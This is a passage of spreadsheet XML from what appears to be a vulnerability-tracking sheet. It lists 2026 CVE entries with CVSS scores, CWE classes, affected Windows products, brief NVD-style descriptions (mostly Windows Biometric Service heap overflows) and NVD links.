      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>A user able to submit SQL through an application using the MongoDB Connector for BI ODBC driver can supply a positioned-cursor statement whose cursor name exceeds the size of an internal fixed-length buffer. Because the name length is not bounded before the driver builds its diagnostic message, memory adjacent to that buffer is overwritten with user-supplied content. This can terminate the hosting application process and may allow unintended code to run within it.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81532</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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 s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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9" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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 s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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 s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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2" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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3" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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4" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69787</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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5" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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8" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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 s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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1" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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2" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
